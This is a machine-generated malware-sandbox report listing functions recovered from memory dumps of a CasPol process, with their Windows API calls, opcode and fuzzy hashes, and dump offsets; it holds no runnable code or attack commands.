Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 5b4d9bd4dbbdcd6d527272924b463263aa5e3aec0060f19e7b22c58e071d2098
Instruction ID: 8eb48435c7ae476a74c8d728eb2ac344711d808151d1b91542da5cea8410ccdc
Opcode Fuzzy Hash: 5b4d9bd4dbbdcd6d527272924b463263aa5e3aec0060f19e7b22c58e071d2098
Instruction Fuzzy Hash: 9D018F71500200ABD250DF1ADD82B22FBA4EB88B20F14811AED084B681D371B916CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AB5C2 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EA4,?,?), ref: 1D2AB612

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 98049a2b26633c2e402ee035f9972a5528f4fef93eebfbb7143458081c70d7cd
Instruction ID: 961978353e581637a2a4ef0d12c0b028e8283b23c3e6a904df8043840a92f972
Opcode Fuzzy Hash: 98049a2b26633c2e402ee035f9972a5528f4fef93eebfbb7143458081c70d7cd
Instruction Fuzzy Hash: 50018F71500200ABD250DF1ADD82B22FBA4FB88B20F14811AED084B681D271B916CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA346 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,AA0DAAB3), ref: 1D2AA378

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 618517f6fa5cea71975dd740f727eeabe199124045181a65840747846639e870
Instruction ID: 04fb7e41d51d5bf04ff9bbce73f0e349f830b8f59a5bd1ab24cdd5056b5f704b
Opcode Fuzzy Hash: 618517f6fa5cea71975dd740f727eeabe199124045181a65840747846639e870
Instruction Fuzzy Hash: FE01F271A042408FD711CF19D884766FBA4EF00320F08C0AADD498FB42D278E808CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0F06 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,?), ref: 00EF0F3E

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: a8c50dd910aaf9aa29b2255c006be0674d7c0fad3d41f7976e18622ab2aa8017
Instruction ID: 3b87df181ee0122c655850d7c85d0150b0964f142831728cb660e5185e491ed3
Opcode Fuzzy Hash: a8c50dd910aaf9aa29b2255c006be0674d7c0fad3d41f7976e18622ab2aa8017
Instruction Fuzzy Hash: D901B172A043048FDB20CF55D844B72FBA0EF44320F0884AADE499F252D375A804CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AB736 Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 1D2AB768

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 8fef9e56dd133fd778fc1265323cafd4ebbfbb4698e5c2860548bd1f94214eab
Instruction ID: 716453698200e15a1d232701f0e6add1a5f123689b975ee62e8cdf0fe59123d4
Opcode Fuzzy Hash: 8fef9e56dd133fd778fc1265323cafd4ebbfbb4698e5c2860548bd1f94214eab
Instruction Fuzzy Hash: C301A2759042408FD750CF15DD84765FBA4EF44720F08C4AADD4C9F652D2B9A804CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA4B6 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,AA0DAAB3,00000000,?,?,?,?,?,?,?,?,72DE3C38), ref: 1D2AA4E8

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: d4a53e2c583528e6b4a1bf8945c3f233b93fa879e32095b02d4b7fdfe1bd43b0
Instruction ID: daa132debd8793d1273d6fef78a07e2eb3e309f0cd9240cf39951d6f398a4f82
Opcode Fuzzy Hash: d4a53e2c583528e6b4a1bf8945c3f233b93fa879e32095b02d4b7fdfe1bd43b0
Instruction Fuzzy Hash: 7DF0FF309042408FD720CF09D888762FBA0EF04720F08C0AADD494FB12D379E808CE72

Uniqueness

Uniqueness Score: -1.00%

Function 200F46BF Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

:@$r, xrefs: 200F4882

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: :@$r
API String ID: 0-2175515567
Opcode ID: 7940af7e15ced3f3f488bccb637c99e8fa24d17a07e860847b36928709aa3628
Instruction ID: 3b2daa178ff1b5272c463f27b691cda857f05b414280a6d767699f1be78b8b98
Opcode Fuzzy Hash: 7940af7e15ced3f3f488bccb637c99e8fa24d17a07e860847b36928709aa3628
Instruction Fuzzy Hash: 9EA15E34A042188FDB04DFB8C48866EBBF2FF84314F258569D915AB395DB75EC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 200F4720 Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

:@$r, xrefs: 200F4882

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: :@$r
API String ID: 0-2175515567
Opcode ID: df98ab73ce0358e17fb55ae25263bf85d6652e4efce5c9e2fe21980fc6ce381e
Instruction ID: bf6696eeab570ec1266044928f4ca821f6811dd0053b25ac7289dcf80c8c75ba
Opcode Fuzzy Hash: df98ab73ce0358e17fb55ae25263bf85d6652e4efce5c9e2fe21980fc6ce381e
Instruction Fuzzy Hash: F2A14A34A402188FDB14DFB8C48866EBBF2FF84314F258529D915AB394DB35ED42DB92

Uniqueness

Uniqueness Score: -1.00%

Function 200F40A8 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

:@$r, xrefs: 200F40D5

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: :@$r
API String ID: 0-2175515567
Opcode ID: f04e3a31b950b39989fb65822e13afadca40ddd40b5e6d7932a3abc85e0f48a2
Instruction ID: 19f8f91c30d282ad34493a1d87880ebd29b7e68eec3a4a03bcf589f08941b013
Opcode Fuzzy Hash: f04e3a31b950b39989fb65822e13afadca40ddd40b5e6d7932a3abc85e0f48a2
Instruction Fuzzy Hash: 05710570E011199FDB44DFA8D488A9EBBF2BF88314B15C164E819A7355DB34ED429B90

Uniqueness

Uniqueness Score: -1.00%

Function 200F409E Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

:@$r, xrefs: 200F40D5

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: :@$r
API String ID: 0-2175515567
Opcode ID: a6bc2c22f531d366cfc8077d1ba8f50f7577d15b408017670be49ecebb7b7eb3
Instruction ID: 1d12a4f013ddb2ddca56a0f2293778092aba6c049cbd6a4464b761bcf311af2f
Opcode Fuzzy Hash: a6bc2c22f531d366cfc8077d1ba8f50f7577d15b408017670be49ecebb7b7eb3
Instruction Fuzzy Hash: D5712370E001199FDB44DFA8D488A9EBBF2BF88314B25C164E809A7355DB34EE429B90

Uniqueness

Uniqueness Score: -1.00%

Function 200F4AC8 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

|mHr, xrefs: 200F4B64

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: |mHr
API String ID: 0-3322498390
Opcode ID: d804396efce137e2a216167c876c8ba5a76b00c0d9c4212a3704292a2e667811
Instruction ID: aa5bc0014ab6c801d430d6148766ad08bd295f839a3e38b397a24f99c51b061e
Opcode Fuzzy Hash: d804396efce137e2a216167c876c8ba5a76b00c0d9c4212a3704292a2e667811
Instruction Fuzzy Hash: 7D21B034B002148FD704EBBD9898B6B7BE6ABC8700F054079DA09CB392EE78DC018792

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AB142 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,AA0DAAB3,00000000,?,?,?,?,?,?,?,?,72DE3C38), ref: 1D2AB1A4

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 498fed56010200b8628f4485a939c2132ff9cd85e0b3e8d97587b4e71084aebc
Instruction ID: 3011a31c1c5a62a35413c7678cfca64d5ff189687f65c98523c808393683d8c8
Opcode Fuzzy Hash: 498fed56010200b8628f4485a939c2132ff9cd85e0b3e8d97587b4e71084aebc
Instruction Fuzzy Hash: 0511BF714093C09FEB128F25DC54AA2BFB4DF47610F0880CAEDC48F663C265A808D772

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AB172 Relevance: 1.3, APIs: 1, Instructions: 35sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,AA0DAAB3,00000000,?,?,?,?,?,?,?,?,72DE3C38), ref: 1D2AB1A4

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d4a53e2c583528e6b4a1bf8945c3f233b93fa879e32095b02d4b7fdfe1bd43b0
Instruction ID: d700133d8abd15c58c0edf0d01e2ad9d1bed8d65936193c961fb88a1a741af10
Opcode Fuzzy Hash: d4a53e2c583528e6b4a1bf8945c3f233b93fa879e32095b02d4b7fdfe1bd43b0
Instruction Fuzzy Hash: 34F0AF359042849FD720CF19D985B65FFA0EF85721F08C49ADD494FB52D3B9A808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 200FA840 Relevance: 1.0, Instructions: 991COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ec0d6cd1ec5ce0da5baa617b72a3c6a8832e9fedb7f2e03a15014e63f4a5ef7
Instruction ID: 08929fc5d0d8fa2099cabd11400b1483d53069a894e4e647e266e4da1fc40747
Opcode Fuzzy Hash: 6ec0d6cd1ec5ce0da5baa617b72a3c6a8832e9fedb7f2e03a15014e63f4a5ef7
Instruction Fuzzy Hash: 0172D230B002188FDB05DBB8C49866EBBF2AF89314F158569D51ADB391DF79DC42CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C2992 Relevance: .7, Instructions: 682COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49631dcc474c60aae073cd6993420b958e1956081b75ed8af36cb28a8f86f4d5
Instruction ID: 1ad077859e1621bbe40d3dcf9e613ce403c1e26de3a4afda5e1617fdaef3fd56
Opcode Fuzzy Hash: 49631dcc474c60aae073cd6993420b958e1956081b75ed8af36cb28a8f86f4d5
Instruction Fuzzy Hash: FA72F974A0026ACFCB55DF28C898B9EBBB5BF84304F1481D9D509AB345DB74AE81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C29A0 Relevance: .7, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 298fa5332f772455ed3a37756d0024118a8c0a9eef303c29f9fbf86c0205f21f
Instruction ID: ba7958a6cd848cae636d11d00ce478aab3c16f736b8b0e80aa314edb654161b2
Opcode Fuzzy Hash: 298fa5332f772455ed3a37756d0024118a8c0a9eef303c29f9fbf86c0205f21f
Instruction Fuzzy Hash: CC72F974A0026ACFCB55DF28C898B9EBBB5BF84304F1481D9D509AB345DB74AE81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 200F6E68 Relevance: .6, Instructions: 640COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82527bfd7069d862fdda50f2fbb507035e919ff5d4bcada5d23b199521b3f021
Instruction ID: 6be3f5095c92c00de50aca85a1db4dd6cfbfdb2b48a649b6bb6be1b80a251cf4
Opcode Fuzzy Hash: 82527bfd7069d862fdda50f2fbb507035e919ff5d4bcada5d23b199521b3f021
Instruction Fuzzy Hash: 94425610E08BD58DE72592BC959C78D3ED26B93218F2982F7C0D88F2E7EE7498459713

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C3637 Relevance: .5, Instructions: 510COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9f81ba0f61d1a10a59c2a638dbaf7446d04a2df2efbb3833c7f298157b9cdb0
Instruction ID: c563776b7e6654131ed8f9e4936ab49775612bf01ba23736650d539f7fd7969b
Opcode Fuzzy Hash: b9f81ba0f61d1a10a59c2a638dbaf7446d04a2df2efbb3833c7f298157b9cdb0
Instruction Fuzzy Hash: 3D423C78A15269DFCB62DF28C988A98BBF9FB49211F1081DAE81D93711DB315F91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C3667 Relevance: .5, Instructions: 507COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a83b8ec95fdaaec81f89dc56f85ac7dafd849c5d0fda8cd9383a99937064657
Instruction ID: a77343e6441e28d7b1bc29ef8bf34636a7bba93405d145fec5d4efac5c0fadf5
Opcode Fuzzy Hash: 7a83b8ec95fdaaec81f89dc56f85ac7dafd849c5d0fda8cd9383a99937064657
Instruction Fuzzy Hash: E9423B78A11269DFCB52DF28C988A98BBF9FB49211F1081DAE81DA3711DB315E91CF11

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C36BB Relevance: .5, Instructions: 495COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57cbdcb556fa1ebeb8871b3fefc8bb45d8480264c0db478e4caab24892542c4f
Instruction ID: 92b2ab974e290170cfa456d8870365e53d1ee0cb823816f12062b1e46a7a7771
Opcode Fuzzy Hash: 57cbdcb556fa1ebeb8871b3fefc8bb45d8480264c0db478e4caab24892542c4f
Instruction Fuzzy Hash: E7423C78A15269DFCB52DF28C988A98BBF9FB49211F1081DAE81D93711DB315F91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 200FB578 Relevance: .5, Instructions: 488COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c33fc6569f616b0f6760580ea4bcdc996f4d6f5729eb80186bca541ea5f0004a
Instruction ID: bf726b4c34cc70765aafe5b01db08b7e205b210585f41ef7c99a5733460791e3
Opcode Fuzzy Hash: c33fc6569f616b0f6760580ea4bcdc996f4d6f5729eb80186bca541ea5f0004a
Instruction Fuzzy Hash: D4028E34B002198FDB14DBB8C4886AEBBF6EF88354B158069E519D7391EF789D02DF91

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C3706 Relevance: .5, Instructions: 487COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3246abcd6a090359866dd279670d348b65ce87a7d54cd8035fac99522e6411
Instruction ID: 78d84339608293de6e59820f77b8db727fdb109906191a236abc8af4ac65c100
Opcode Fuzzy Hash: 3d3246abcd6a090359866dd279670d348b65ce87a7d54cd8035fac99522e6411
Instruction Fuzzy Hash: 55423C78A15269DFCB52DF28C988A98BBF9FB49311F1081DAE81DA3711DB315E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C375A Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90262eb934355a6bcc431ba4273e5bd372254dad16a4641bbc70b169a7ac3e15
Instruction ID: 220397e878d01b0e0d409e78ec53794f6c36f30a1b783a112db48d6e488e2656
Opcode Fuzzy Hash: 90262eb934355a6bcc431ba4273e5bd372254dad16a4641bbc70b169a7ac3e15
Instruction Fuzzy Hash: 2D323C78A15269DFCB52DF28C988A98BBF9FB49311F1081DAE81DA3711DB315E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C37AE Relevance: .5, Instructions: 467COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0adc2b5281b09745e7984cb4397e21415ff4ba7117e8fc73d908e632d32bb913
Instruction ID: 9309eafa1608b37c5435d252142617bae6aca6063d0e0b0b6edec3db8c9600a3
Opcode Fuzzy Hash: 0adc2b5281b09745e7984cb4397e21415ff4ba7117e8fc73d908e632d32bb913
Instruction Fuzzy Hash: 2F322C78A15269DFCB52DF28C988A98BBF9FB49311F1081DAE81DA3711DB315E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C3802 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6b2077bec17b887adc4e9c47021fdb55b3412c8792e2da0d5338390ff316eb8
Instruction ID: 64d4573bbc10191a21125a443bb5d86c7a2a935198ba876a289bc6459535db7a
Opcode Fuzzy Hash: a6b2077bec17b887adc4e9c47021fdb55b3412c8792e2da0d5338390ff316eb8
Instruction Fuzzy Hash: 66323C78A15269DFCB52DF28C988A98BBF9FB49211F1081DAE81DA3711DB315E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C3856 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d71ef93e2800f0d8dfb04b3a56f24d23e115eb36d48ae67d6fff38c6fd70844d
Instruction ID: 105b2f11d2637b0cdc27ce03cf09b7abe3f23b54726f24aff9985c02f347e2d1
Opcode Fuzzy Hash: d71ef93e2800f0d8dfb04b3a56f24d23e115eb36d48ae67d6fff38c6fd70844d
Instruction Fuzzy Hash: 46323C78A15269DFCB52DF28C988A98BBF9FB49311F1081DAE81D93711DB315E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 200FF0B0 Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2572b8e31565ee9de4cff038b7f65bc759a61a63f3c460cd747294fb3d7d1bc
Instruction ID: 8bb7e7fb04fa5dfe99777090b2450154b234a5b3ddafc3d30e8bb8828ab72994
Opcode Fuzzy Hash: f2572b8e31565ee9de4cff038b7f65bc759a61a63f3c460cd747294fb3d7d1bc
Instruction Fuzzy Hash: D1F14B34A002198FDB14DBB8C898A6DB7F2EF88314F258664D919EB395DF74EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C38AA Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1032760f1cc65fef8c258d4cf633eee562f491b818060bf4cc63acea023ebb62
Instruction ID: 66f07ad2fcca3c0848d805004078f44f5b62a4b49dd2b2fc45749ee10f25e4be
Opcode Fuzzy Hash: 1032760f1cc65fef8c258d4cf633eee562f491b818060bf4cc63acea023ebb62
Instruction Fuzzy Hash: 63223B78A15269DFCB62DF28C988A98BBF9FB49211F1081DAE81D93711DB315E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C38F5 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1621c2be9a6cb8b32c2e692381d33107587ab48446f936e3b94ef66ab56efe3f
Instruction ID: 666bd8b0cd1b87611f9dcac2d50c5f6794d9458390b9d8d5f9d83713047e3176
Opcode Fuzzy Hash: 1621c2be9a6cb8b32c2e692381d33107587ab48446f936e3b94ef66ab56efe3f
Instruction Fuzzy Hash: EB223B78A15269DFCB62DF28C988A98BBF9FB49311F1081DAE81D93711DB315E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C3940 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49835ca1cf436b668add474237df4eda559d7b381ae4bcdacf469b54d6b5c85c
Instruction ID: 680da211fd948d90e1ad2c08df58403815106f446f79f475e576f3d8ad010314
Opcode Fuzzy Hash: 49835ca1cf436b668add474237df4eda559d7b381ae4bcdacf469b54d6b5c85c
Instruction Fuzzy Hash: 44223B78A15269DFCB62DF28C988A98BBF9FB49211F1081DAE81D93711DB315E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C3982 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5b7d40c8db6eefdcf2327f3d6d6ce6bffdbd90a38274b5395c0c6e8f7594beb
Instruction ID: 8711f36a5a49590b73ed6481d8e26bf07dad05dbc6efae49f91ae83171d81563
Opcode Fuzzy Hash: d5b7d40c8db6eefdcf2327f3d6d6ce6bffdbd90a38274b5395c0c6e8f7594beb
Instruction Fuzzy Hash: 6D222C78A15269DFCB62DF28C988A98BBF9FB49311F1081DAE81D93711DB315E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C1AD8 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 010c5ef907e105fde39a537c14009c1c2962a674cc1527bd0607cf29ec5aa7cc
Instruction ID: 7540d68401aa87908d69fd87e352708d0ffea1113586e6d84e846db409050c92
Opcode Fuzzy Hash: 010c5ef907e105fde39a537c14009c1c2962a674cc1527bd0607cf29ec5aa7cc
Instruction Fuzzy Hash: 56E1C238A002558BDB249B7DC0903AD77B2EB86354F604A7ED05ADB391DB7ADC41CB93

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C39CD Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6d417d0a32ec559b083f8a1a67ed1b69ba261b6e4142914b4108b87118cb24
Instruction ID: a69224db2b675882dcf88c01853dabdf78b07be9d95ce8ca5e852bc3457eb186
Opcode Fuzzy Hash: 3e6d417d0a32ec559b083f8a1a67ed1b69ba261b6e4142914b4108b87118cb24
Instruction Fuzzy Hash: 76221C78A15269DFCB62DF28C988698BBF9FB49311F1081DAE81DA3711DB315E91CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C5C18 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7940e92050241d7368491ada0259c1e03347a6dda0a5478c69b789cbdcb9b44a
Instruction ID: 61d35411a5b4de12cb3339f471dc2bce24eea952c304993d54d96528d7026555
